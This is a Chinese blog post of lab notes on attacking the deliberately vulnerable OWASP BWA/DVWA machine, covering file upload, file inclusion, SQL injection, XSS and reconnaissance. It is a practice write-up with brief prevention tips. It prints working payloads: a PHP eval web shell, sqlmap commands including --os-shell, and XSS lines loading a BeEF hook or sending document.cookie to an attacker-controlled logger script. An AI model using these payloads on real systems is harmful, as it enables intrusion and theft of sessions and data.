owaspbwa靶机实践

最新推荐文章于 2024-07-11 22:02:56 发布
最新推荐文章于 2024-07-11 22:02:56 发布
阅读量3.8k 收藏 20
点赞数 3
分类专栏: 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45528771/article/details/103965486
版权

upload

低安全级别

一、直接上传php木马文件

<?php @eval($_POST[joe]);?>

二、菜刀连接
上面代码中joe为连接密码

中安全级别

一、使用kali中的burp suite软件进行代理拦截

  1. 点入proxy栏中的options栏,将拦截地址改为kali的网络地址(在命令行中输入ip a即可得到)
  2. 再将上传文件的浏览器中的代理地址改为kali的网络地址,并上传php木马文件
  3. 文件会被burp suite拦截,将其中文件mime类型改为指定的image/jpeg
  4. 点击forward发送,文件成功上传

二、菜刀连接

file inclusion

避免方法

文件包含指定特定文件,误用*

低安全级别

方法一:本地文件包含

一、用edjpgcom把生成php木马文件的代码写入一张图片中,并上传

<?fputs(fopen("upload.php","w"),'<?php @eval($_POST[joe]);?>')?>

二、文件包含界面访问该文件
访问后自动生成木马文件
三、菜刀连接

方法二:远程文件包含

一、在kali中搭建服务器
命令行中输入
systemctl start apache2
systemctl status apache2
二、在服务器中写入能够生成php木马文件的文件
vim /var/www/html/inclusion.txt

<?fputs(fopen("upload.php","w");'<?php @eval($_POST[joe]);?>'?>

退出并保存:先按esc,再输入 :wq(冒号不可去)
三、文件包含界面访问该文件
该文件的地址为:kali网络地址/inclusion.txt
四、菜刀连接

中安全级别

方法一:本地文件包含

与低安全级别一致

方法二:远程文件包含

与低安全级别大致一致
不同点在,访问文件时,需打碎http://,如hthttp://tp://

SQL injection

用union连接其他表,但需列数相同,列数不够可用1234顶替。

information_schema库

查看所有库及表 information_schema.tables

select DISTINCT table_schema from information_schema.tables;
此语句等同于show databases;

select table_name from information_schema.tables where table_schema=“dvwa”;
此语句等同于在dvwa库中show tables;

select table_schema,GROUP_CONCAT(table_name) from information_schema.tables GROUP BY table_schema;
此语句将库分组,显示出所有库及表

查看表中的列 information_schema.columns

select column_name from information_schema.columns where table_schema="" and table_name="";

手动注入

检查是否有注入点

输入单引号’,若报错而不是过滤掉,则表明存在注入点。

基于布尔的注入

此注入可获得当前表中所有的数据
原语句 SELECT first_name, last_name FROM users WHERE user_id = ‘$id’
输入 233’ or 1=1 – a
单引号前输入什么都没关系,单引号用于封闭 $id 前的单引号,or后面接上一个真条件,–为注释,其后必须有空格,a可用任何替换,目的是注释掉 $id 后面的单引号

基于union的注入

输入 ’ union select 1,2,3… –
其中1,2,3…从1输起,因为union select需与前面的字段数(多少列)相同,用于检测原语句中select多少个字段数

输入 ’ union select user(),database() – a
若上一步检测到只有两个字段数,则输入此语句得到当前用户及所在库,要搜的字段数不够则用数字填充,多了用concat连接字段,如 concat(user," ",password)

基于时间的盲注

直接输入单引号不给予反应时,使用基于时间的盲注
原语句 SELECT first_name, last_name FROM users WHERE user_id = ‘$id’
输入 1’ and sleep(5) –
如果停5秒,则有注入点

自动注入

使用kali中的sqlmap工具
命令行中输入形如 sqlmap -u “http://…?id=1” 搜索注入点

步骤

–batch
自动化搜索注入点

–current-db
获取当前库

–dbs
获取所有库

-D 库名 --tables
获取指定库所有表

-D 库名 -T 表名 --columns
获取指定库指定表中所有列

-D 库名 -T 表名 -C “列名” --dump
获取指定库、表、列的所有数据,多列名里用逗号连接

-D 库名 -T 表名 --dump
获取指定库、表的所有数据

另,如果需要先登录的情况检测,则先用浏览器的工具获得cookie
–cookie=" "
里面的值用等号连接

sqlmap指令

-u " " 后接搜索注入点的url
–batch 自动化输入
–dbms mysql 指定数据库为mysql
-p id 指定注入点id
–sql-shell 获取数据库权限
–os-shell 获取操作系统权限

避免方法

转义或者过滤单引号

XSS

含两种:XSS reflected、XSS stored
XSS reflected需要诱导用户点击
XSS stored不需要,只需用户进入即可

避免方法

过滤字符<>/

构造XSS脚本

弹框警告

用于检测是否存在XSS漏洞
<script> alert('xss')</script>

页面嵌套

<iframe src=http://www.baidu.com width=300 height=300></iframe>

页面重定向

<script>window.location="http://www.baidu.com"</script>
<script>location.href="http://www.baidu.com"</script>

弹框警告及页面重定向

<script>alert("baidu");window.location="http://www.baidu.com"</script>

访问恶意代码

<script src="http://BeEF_IP:3000/hook.js"></script>
可利用大小写绕开过滤脚本
<sCrIpT src="http://BeEF_IP:3000/hook.js"></SRCipt>
也可巧用图片标签
<img src="http://BeEF_IP:3000/hook.js"></img>
也可利用字符编码,即将每个字符转换为其对应的编码,如x为&#120;,s为&#115;

手工XSS

一、kali搭建服务器并写好木马程序
systemctl start apache2
vim /var/www/html/cookie_get.php

<?php
	$cookie = $_GET['cookie'];
	$log = fopen("cookie.txt","a");
	fwrite($log,$cookie."\n");
	fclose($log);
?>

二、kali中给路径权限,用来生成一个存放cookie的文本文件
chown -R www-data.www-data /var/www/
三、在漏洞点写入XSS代码
<script>window.open('http://192.168.159.132/cookie_get.php?cookie='+document.cookie)</script>

自动化XSS

一、kali搭建服务器
service apache2 start
二、打开beef
已设置账号密码为feeb
三、将Example里的代码植入漏洞点
需将网址改为kali的网络地址
<script src="http://192.168.159.132:3000/hook.js"></script>
四、打开web UI的地址
也需将网址改为kali的网络地址
打开登录后,cookie的搜集便都可在里面查看了

里面点入某用户下,current browser栏下的commands栏
绿色代表能够攻击且不会被发现
橙色代表能够攻击但可能会被发现
灰色代表可能可以攻击
红色代表不能攻击

web信息收集

搜索引擎

Google

site:zhihu.com “web安全”
搜索与zhihu.com、"web安全"相关的网页

filetype:pdf “SQL注入”
搜索含“SQL注入”的pdf文件

inurl:.php?id=
搜索网址中含有".php?id="的网页

intitle:后台登陆
搜索网页标题是“后台登陆”的相关页面
intitle:index of “password”
搜索与密码相关的索引目录信息

intext:power by wordpress
搜索正文中含有“power by wordpress”的网页

author:green
搜索作者为Green的网页

以上可同时使用

符号以限定搜索
-keyword 结果不出现keyword关键字
*keyword 结果包含keyword
“keyword” 结果出现keyword
~keyword 结果出现keyword及其近义词
2008…2019 指定年份

Shodan

用于搜索设备

Zoomeye

中国版shodan

目标扫描

nmap

zenmap

图形化的nmap

OpenVAS

已将账号设置为admin,密码为password

openvas-start 启动命令

Joseph佳
关注
  • 3
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
在kali上使用virtualBox搭建OWASPbwa靶机
jelly
02-20 3058
前言 最近学习使用kali系统,在电脑上安装kali+windows10的双系统,在学习了一些常规漏洞后,打算在kali系统中利用virtualBox搭建一个靶机,用于实战练习。 #使用环境 宿主主机:kali linux2019.11 使用软件:virtualbox 6.1.2_Debian r135662 靶机OWASPbwa2.0 具体步骤 1.安装virtualbox 在 /etc/ap...
使用sqlmap对OWASP靶机进行sql注入练习操作实例展示
WEL测试
03-30 1万+
前置条件 靶机OWASP_Broken_Web_Apps_VM_0.94 靶机IP:192.168.88.138 初始密码是:root/owaspbwa kali安装的镜像为:kali-linux-2019.1a-amd64.iso KaliIP为:192.168.88.132 使用sqlmap进行sql注入 网站为:http://192.168.88.138 故意在输入...
OWASP Mutillidae 靶机实验指导书
06-08
该指导书对每个页面存在漏洞进行了详细分类,对OWASP Top 10 应用安全风险-2017中的漏洞举例说明,结合靶机使用还不错。
OWASP ZAP
最新发布
2301_76786857的博客
07-11 1006
OWASP ZAP 是一款功能强大且易于使用的 Web 应用安全测试工具,通过自动化扫描和手动测试相结合,帮助用户发现并修复 Web 应用中的安全漏洞。本文详细介绍了 ZAP 的安装步骤、代理配置、自动化扫描和手动测试的基本操作,希望能帮助用户快速掌握该工具的使用方法。 在实际操作中,ZAP 可以帮助开发者和安全专业人员提高 Web 应用的安全性,保护用户数据免受攻击。
web安全学习笔记(一) OWASPBWA--靶机搭建
qycc3391的博客
02-14 8069
为了学习web安全,需要搭建一个用来攻击的靶机OWASP,Open Web Application Security Project, 提供了许多用于学习安全学习的项目。 这里使用The Broken Web Applications (BWA) Project, 提供一个虚拟机的克隆,包含了含有漏洞的网站,可以使用vmware workstation 打开。此项目的优点是,直接提供了虚拟机的克...
OWASP靶机安装
qq_43681802的博客
02-02 5624
渗透测试靶机系列–(webgoat安装) 文章目录渗透测试靶机系列--(webgoat安装)前言一、WEBGOAT是什么?二、安装步骤1.下载OWASP和vmware2.使用OWASP总结 前言 一、WEBGOAT是什么? WebGoat是OWASP组织研制出的用于进行web漏洞实验的Java靶场程序,用来说明web应用中存在的安全漏洞。WebGoat运行在带有java虚拟机的平台之上,当前提供的训练课程有30多个,其中包括:跨站点脚本攻击(XSS)、访问控制、线程安全、操作隐藏字段、操纵参
攻击机和靶机的使用说明:kali linux和OWAS详细使用教程.pdf
04-14
攻击机和靶机的使用说明:kali linux和OWAS详细使用教程 网卡的详细配置 ## WEB服务器OWASP靶机 ### 下载地址:https://sourceforge.net/projects/owaspbwa/files/ ### web apps: http://192.168.0.113/ #### phpmyadmin: http://192.168.0.113/phpmyadmin ### username: root password: owaspbwa
如何部署OWASP靶机
xiaojiadong2019的博客
10-18 457
4.下图中的网络适配器选择NAT模式,如果NAT模式不能登录请切换到桥接模式(不建议使用桥接模式)7.使用默认用户名与密码登录 admin/admin。5.开启虚拟机,使用如下用户名和密码登录。(具体以自己虚拟机内IP地址为准)1.OWASP下载后解压到本地。6.登录DVWP系统界面。
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
PWN靶机环境 网络安全
05-23
PWN靶机环境
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
OWASP测试指南(中文) v3.0
11-26
OWASP测试指南(中文) v3.0 可编辑和搜索 带目录 搜索资源的时候没有发现v4.0版本 搜索到的全部都是v3.0版本写作v4.0版本
安装部署Web安全测试用的靶机
11-24
本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是一个集成的Web服务器套件,包含了Apache、MySQL、PHP和Perl等组件...
OWASP_VM_1.2靶机的下载、安装及连接访问
ZJLE的博客
08-05 3717
OWASP_VM_1.2靶机的下载、安装及连接访问OWASP_VM_1.2下载OWASP_VM_1.2安装靶机访问不上的问题解决方法 刚刚入门的新手白白们都需要一个可以用来练习的环境,但是dvwa的搭建需要相关环境,所以这里推荐大家在虚拟机上搭建owasp靶机,里面集成了dvwa靶机OWASP(Broken Web Applications Project),是一组易受攻击的Open Web应用程序安全项目,分布在VMware格式的虚拟机上,包含了当前几乎全部类型的漏洞,例如:SQL注入、XSS攻击等等
一次对OWASP靶机的完整渗透攻击
qq_41266196的博客
10-28 5513
一次对OWASP靶机的完整渗透攻击 实验环境 靶机owaspbwa http://192.168.11.128/wordpress/ 攻击机:kali 192.168.11.133 信息收集 测试连通性 ping 192.168.11.128 获取系统服务版本等信息 nmap -sV 192.168.11.128 Apache httpd 2.2.14 PHP/5.3.2-1 ubuntu4.30 用nikti扫描以及信息挖掘 nikto -host http://192.168.11.128:
靶机OWASPBWA下载及安装
weixin_45798017的博客
03-31 5923
下载路径:https://sourceforge.net/projects/owaspbwa/files/
OWASP靶机解题笔记_WebGoat_General篇
xxx_Python的博客
05-22 4104
OWASP靶机解题笔记_WebGoat_General篇一、如何访问General二、General内容介绍及解题1、Http Basics2、HTTP Splitting解题方法3、 Cache Poisoning解题方法 一、如何访问General 通过浏览器访问http://IP,然后在web页面点击进入OWASP WebGoat 点击后需输入OWASP靶机账号密码授权root/owaspbwa 点击Start WebGoat 开始你的学习之旅吧! 二、General内容介绍及解题 本次学习过程
网络安全之OWASP Broken Web Apps渗透测试环境搭建&安装 详细教程
小啊呜的博客
05-08 1万+
网络安全之OWASP Broken Web Apps渗透测试环境搭建&安装 详细教程 一、关于 OWASP 下载安装 二、导入VMware Worksation 三、登录和访问 叮嘟!这里是小啊呜的学习课程资料整理。好记性不如烂笔头,今天也是努力进步的一天。一起加油进阶吧!
OWASP Broken Web Apps渗透测试环境搭建和安装教程
热门推荐
lucashu的博客
04-14 1万+
本文目录概述导入Vmware登录靶机 概述 OWASP Broken Web App 项目生成一个虚拟机,能够运行各种已知漏洞的应用程序 官网下载地址: https://sourceforge.net/projects/owaspbwa/files 官网下载最新版本 导入Vmware 在Vmware中直接打开虚拟机 登录靶机 在启动以后输入用户名root 密码owaspbw...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值